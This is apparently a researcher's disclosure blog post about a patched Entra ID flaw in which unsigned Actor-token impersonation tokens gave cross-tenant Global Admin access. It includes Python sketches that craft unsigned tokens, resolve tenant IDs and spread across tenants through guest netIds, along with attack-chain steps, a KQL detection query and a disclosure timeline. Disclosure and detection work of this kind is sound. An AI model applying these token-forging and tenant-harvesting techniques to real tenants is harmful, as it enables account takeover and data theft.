This information could be accessed by impersonating a regular user in the victim tenant. If you want to know the full impact, my tool roadrecon uses the same API, if you run it then everything you find in the GUI of the tool could have been accessed and modified by an attacker abusing this flaw.
If a Global Admin was impersonated, it would also be possible to modify any of the above objects and settings. This would result in full tenant compromise, with access to any service that uses Entra ID for authentication, such as SharePoint Online and Exchange Online. It would also provide full access to any resource hosted in Azure, since these resources are controlled from the tenant level and Global Admins can grant themselves rights on Azure subscriptions. Modifying objects in the tenant does (usually) result in audit logs being generated. That means that while theoretically all data in Microsoft 365 could have been compromised, doing anything other than reading the directory information would leave audit logs that could alert defenders. Without knowledge of the specific artifacts that modifications with these Actor tokens generate, however, it would appear as if a legitimate Global Admin had performed the actions.
Based on Microsoft’s internal telemetry, they did not detect any abuse of this vulnerability. If you want to search for possible abuse artifacts in your own environment, a KQL detection is included at the end of this post.
Actor tokens are tokens that are issued by the “Access Control Service”. I don’t know the exact origins of this service, but it appears to be a legacy service that is used for authentication with SharePoint applications and also seems to be used by Microsoft internally. I came across this service while investigating hybrid Exchange setups. These hybrid setups used to provision a certificate credential on the Exchange Online Service Principal (SP) in the tenant, with which it can perform authentication. These hybrid attacks were the topic of some talks I did this summer, the slides are on the talks page. In this case the hybrid part is not relevant, as in my lab I could also have added a credential on the Exchange Online SP without the complete hybrid setup. Exchange is not the only app which can do this, but since I found this in Exchange we will keep talking about these tokens in the context of Exchange.
Exchange will request Actor tokens when it wants to communicate with other services on behalf of a user. The Actor token allows it to “act” as another user in the tenant when talking to Exchange Online, SharePoint and, as it turns out, the Azure AD Graph. The Actor token itself is a JSON Web Token (JWT); decoded, a few of its fields differ from those of regular Entra ID access tokens:
The aud field contains the GUID of the Azure AD Graph API, as well as the URL graph.windows.net and the tenant it was issued to 6287f28f-4f7f-4322-9651-a8697d8fe1bc.
The expiry is exactly 24 hours after the token was issued.
The iss contains the GUID of the Entra ID token service itself, called “Azure ESTS Service”, and again the tenant GUID where it was issued.
The token contains the claim trustedfordelegation, which is True in this case, meaning we can use this token to impersonate other identities. Many Microsoft apps could request such tokens. Non-Microsoft apps requesting an Actor token would receive a token with this field set to False instead.
When using this Actor token, Exchange embeds it in an unsigned JWT that is then sent to the resource provider, in this case the Azure AD Graph. In the rest of this post I call these impersonation tokens, since they are used to impersonate users.
The sip, smtp, upn fields are used when accessing resources in Exchange online or SharePoint, but are ignored when talking to the Azure AD Graph, which only cares about the nameid. This nameid originates from an attribute of the user that is called the netId on the Azure AD Graph. You will also see it reflected in tokens issued to users, in the puid claim, which stands for Passport UID. I believe these identifiers are an artifact from the original codebase which Microsoft used for its Microsoft Accounts (consumer accounts or MSA). They are still used in Entra ID, for example to map guest users to the original identity in their home tenant.
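To make the shape of these tokens concrete, here is a minimal sketch in Python. The overall structure (an alg of “none”, an embedded signed Actor token, a caller-chosen nameid) follows the description above, but the exact claim names, such as actortoken, are my assumption rather than the confirmed wire format:

import base64
import json
import time

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def impersonation_token(actor_token, tenant_id, net_id):
    header = {"alg": "none", "typ": "JWT"}       # carries no signature at all
    payload = {
        "aud": f"https://graph.windows.net/{tenant_id}",  # assumed audience form
        "actortoken": actor_token,  # embedded signed Actor token (claim name assumed)
        "nameid": net_id,           # the only identity field the API checked
        "nbf": int(time.time()),
        "exp": int(time.time()) + 3600,
    }
    # Three dot-separated segments; the signature segment is simply empty.
    return ".".join([b64url(json.dumps(header).encode()),
                     b64url(json.dumps(payload).encode()),
                     ""])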
As I mentioned before, these impersonation tokens are not signed. That means that once Exchange has an Actor token, it can use the one Actor token to impersonate anyone against the target service it was requested for, for 24 hours. In my personal opinion, this whole Actor token design is something that never should have existed. It lacks almost every security control that you would want:
There are no logs when Actor tokens are issued.
Since these services can craft the unsigned impersonation tokens without talking to Entra ID, there are also no logs when they are created or used.
They cannot be revoked within their 24 hours validity.
They completely bypass any restrictions configured in Conditional Access.
We have to rely on logging from the resource provider to even know these tokens were used in the tenant.
Microsoft uses these tokens to talk to other services in their backend, something that Microsoft calls service-to-service (S2S) communication. If one of these tokens leaks, it can be used to access all the data in an entire tenant without any useful telemetry or mitigation. In July of this year, Microsoft did publish a blog about removing these insecure legacy practices from their environment, but they do not provide any transparency about how many services still use these tokens.
As I was refining my slide deck and polishing up my proof-of-concept code for requesting and generating these tokens, I tested more variants of using these tokens, changing various fields to see if the tokens still worked with the modified information. As one of the tests, I changed the tenant ID of the impersonation token to a different tenant in which none of my test accounts existed. The Actor token’s tenant ID was my iminyour.cloud tenant, with tenant ID 6287f28f-4f7f-4322-9651-a8697d8fe1bc, and the unsigned JWT I generated had the tenant ID b9fb93c1-c0c8-4580-99f3-d1b540cada32.
I sent this token to graph.windows.net using my CLI tool roadtx, expecting a generic access denied since I had a tenant ID mismatch. However, I was instead greeted by a curious error message:
Note that these are the actual screenshots I made during my research, which is why the formatting may not work as well in this blog
The error message suggested that while my token was valid, the identity could not be found in the tenant. Somehow the API seemed to accept my token even with the mismatching tenant. I quickly looked up the netId of a user that did exist in the target tenant, crafted a token and the Azure AD Graph happily returned the data I requested. I tested this in a few more test tenants I had access to, to make sure I was not crazy, but I could indeed access data in other tenants, as long as I knew their tenant ID (which is public information) and the netId of a user in that tenant.
To demonstrate the vulnerability, here I am using a Guest user in the target tenant to query the netId of a Global Admin. Then I impersonate the Global Admin using the same Actor token, and can perform any action in the tenant as that Global Admin over the Azure AD Graph.
First I craft an impersonation token for a Guest user in my victim tenant:
I use this token to query the netId of a Global Admin:
Then I create an impersonation token for this Global Admin (the UPN is kept the same since it is not validated by the API):
And finally this token is used to access the tenant as the Global Admin, listing the users, something the guest user was not able to do:
I can even run roadrecon with this impersonation token, which queries all Azure AD Graph API endpoints to enumerate the available information in the tenant.
None of these actions would generate any logs in the victim tenant.
With this vulnerability it would be possible to compromise any Entra ID tenant. Starting with an Actor token from an attacker controlled tenant, the following steps would lead to full control over the victim tenant:
Find the tenant ID for the victim tenant; this can be done using public APIs based on the domain name (a sketch follows this list).
Find a valid netId of a regular user in the tenant. Methods for this will be discussed below.
Craft an impersonation token with the Actor token from the attacker tenant, using the tenant ID and netId of the user in the victim tenant.
List all Global Admins in the tenant and their netId.
Craft an impersonation token for the Global Admin account.
Perform any read or write action over the Azure AD Graph API.
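Step 1 of the chain requires no authentication at all. A minimal sketch using the standard OpenID Connect discovery endpoint, whose issuer field embeds the tenant GUID:

import json
import re
import urllib.request

def resolve_tenant_id(domain):
    # Unauthenticated OIDC discovery; works for any verified domain.
    url = f"https://login.microsoftonline.com/{domain}/.well-known/openid-configuration"
    with urllib.request.urlopen(url) as resp:
        issuer = json.load(resp)["issuer"]  # e.g. https://sts.windows.net/<guid>/
    return re.search(r"[0-9a-f-]{36}", issuer).group(0)

print(resolve_tenant_id("iminyour.cloud"))  # 6287f28f-4f7f-4322-9651-a8697d8fe1bc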
If an attacker makes any modifications in the tenant in step 6, that would be the only event in this chain that generates any telemetry in the victim tenant. An attacker could for example create new user accounts, grant these Global Admin privileges and then sign in interactively to any Entra ID, Microsoft 365 or third party application that integrates with the victim tenant. Alternatively they could add credentials on existing applications, grant these apps API permissions and use that to exfiltrate emails or files from Microsoft 365, a technique that is popular among threat actors. An attacker could also add credentials to Microsoft Service Principals in the victim tenant, several of which can request Actor tokens that allow impersonation against SharePoint or Exchange. For my DEF CON and Black Hat talks I made a demo video about using these Actor tokens to obtain Global Admin access. The video uses Actor tokens within a tenant, but the same technique could have been applied to any other tenant by abusing this vulnerability.
Since tenant IDs can be resolved when the domain name of a tenant is known, the only identifier that is not immediately available to the attacker is a valid netId for a user in that specific tenant. As I mentioned above, these IDs are added to Entra ID access tokens as the puid claim. Any token found online, in screenshots, examples or logs, even those that are long expired or with an obfuscated signature, would provide an attacker with enough information to breach the tenant. Threat actors that still have old tokens for any tenant from previous breaches can immediately access those tenants again as long as the victim account still exists.
The above is probably not a very common occurrence. A more realistic attack is simply brute-forcing the netId. Unlike object IDs, which are randomly generated, netIds are incremental. Looking at the differences in netIds between my tenant and those of some tenants I analyzed, I found the difference between a newly created user in my tenant and their newest user to be in the range of 100,000 to 100 million. Simply brute-forcing the netId could be accomplished in minutes to hours for any target tenant, and the more users a tenant has, the easier it is to find a match. Since this does not generate any logs, it isn’t a noisy attack either. Because of the possibility of brute-forcing these netIds, I would say this vulnerability could have been used to take over any tenant without any prerequisites. There is, however, a third technique which is even more effective (and more fun from a technical perspective).
I previously mentioned that a users netId is used to establish links between a user account in multiple tenants. This is something that I researched a few years ago when I gave a talk at Black Hat USA 22 about external identities. The below screenshot is taken from one of my slides, which illustrates this:
The way this works is as follows. Suppose we have tenant A and tenant B. A user in tenant B is invited into tenant A. In the new guest account that is created in tenant A, their netId is stored on the alternativeSecurityIds attribute. That means that an attacker wanting to abuse this bug can simply read that attribute in tenant A, put it in an impersonation token for tenant B and then impersonate the victim in their home tenant. It should be noted that this works against the direction of invite. Any user in any tenant where you accept an invite will be able to read your netId, and with this bug could have impersonated you in your home tenant. In your home tenant you have a full user account, which can enumerate other users. This is not a bug or risk with B2B trusts, but is simply an unintended consequence of the B2B design mechanism. A guest account in someone else’s tenant would also be sufficient with the default Entra ID guest settings because the default settings allow users to query the netId of a user as long as the UPN is known.
To abuse this, a threat actor could perform the following steps, given that they have access to at least one tenant with a guest user:
Query the guest users and their alternativeSecurityIds attribute which gives the netId.
Query the tenant ID of the guest users home tenant based on the domain name in their UPN.
Create an impersonation token, impersonating the victim in their home tenant.
Optionally list Global Admins and impersonate those to compromise the entire tenant.
Repeat step 1 for each tenant that was compromised.
The steps above can be done in 2 API calls per tenant, which do not generate any logs. Most tenants will have guest users from multiple distinct other tenants. This means the number of tenants you compromise with this scales exponentially and the information needed to compromise the majority of all tenants worldwide could have been gathered within minutes using a single Actor token. After at least 1 user is known per victim tenant, the attacker can selectively perform post-compromise actions in these tenants by impersonating Global Admins.
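The spread described above is a textbook breadth-first traversal of the guest-user graph; a sketch of the loop, with query_guests as a hypothetical stand-in for the Azure AD Graph call that reads each guest’s alternativeSecurityIds and UPN domain, and resolve_tenant_id as sketched earlier:

from collections import deque

def query_guests(tenant_id):
    # Hypothetical stand-in: one Azure AD Graph query returning, per guest,
    # their home domain (from the UPN) and home netId (alternativeSecurityIds).
    return []

def resolve_tenant_id(domain):
    return domain  # stubbed; see the OIDC discovery sketch earlier

def harvest_tenants(seed_tenant):
    seen = {seed_tenant}
    queue = deque([seed_tenant])
    footholds = {}                              # tenant -> a known netId in it
    while queue:
        for home_domain, net_id in query_guests(queue.popleft()):
            home = resolve_tenant_id(home_domain)
            footholds.setdefault(home, net_id)  # enough to impersonate later
            if home not in seen:                # every new tenant fans out again,
                seen.add(home)                  # hence the exponential growth
                queue.append(home)
    return footholds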
Looking at the list of guest users in the tenants of some of my clients, this technique would be extremely powerful. I also observed that one of the first tenants you will likely compromise is Microsoft’s own tenant, since Microsoft consultants often get invited to customer tenants. Many MSPs and Microsoft Partners will have a guest account in the Microsoft tenant, so from the Microsoft tenant a compromise of most major service provider tenants is one step away.
Needless to say, as much as I would have liked to test this technique in practice to see how fast this would spread out, I only tested the individual steps in my own tenants and did not access any data I’m not authorized to.
While querying data over the Azure AD Graph does not leave any logs, modifying data does (usually) generate audit logs. If modifications are done with Actor tokens, these logs look a bit curious.
Since Actor tokens involve both the app and the user being impersonated, it seems Entra ID gets confused about who actually made the change, and it will log the UPN of the impersonated Global Admin, but the display name of Exchange. Luckily for defenders this creates a nice giveaway when Actor tokens are used in the tenant. After some testing and filtering with some fellow researchers that work on the blue side (thanks to Fabian Bader and Olaf Hartong) we came up with the following detection query:
AuditLogs
| where not(OperationName has "group")
| where not(OperationName == "Set directory feature on tenant")
| where InitiatedBy has "user"
| where InitiatedBy.user.displayName has_any ("Office 365 Exchange Online", "Skype for Business Online", "Dataverse", "Office 365 SharePoint Online", "Microsoft Dynamics ERP")
The exclusion for group operations is there because some of these products do actually use Actor tokens to perform operations on your behalf. For example creating specific groups via the Exchange Online PowerShell module will make Exchange use an Actor token on your behalf and create the group in Entra ID.
This blog discussed a critical token validation failure in the Azure AD Graph API. While the vulnerability itself was a bad oversight in the token handling, the whole concept of Actor tokens is a protocol that was designed to behave with all the properties mentioned in the paragraphs above. If it weren’t for the complete lack of security measures in these tokens, I don’t think such a big impact with such limited telemetry would have been possible.
Thanks to the people at MSRC who immediately picked up the vulnerability report, searched for potential variants in other resources, and to the engineers who followed up with fixes for the Azure AD Graph and blocked Actor tokens for the Azure AD Graph API requested with credentials stored on Service Principals, essentially restricting the usage of these Actor tokens to only Microsoft internal services.
July 15, 2025 - reported further details on the impact.
July 15, 2025 - MSRC requested to halt further testing of this vulnerability.
July 17, 2025 - Microsoft pushed a fix for the issue globally into production.
August 6, 2025 - Further mitigations pushed out preventing Actor tokens being issued for the Azure AD Graph with SP credentials.
...
Read the original on dirkjanm.io »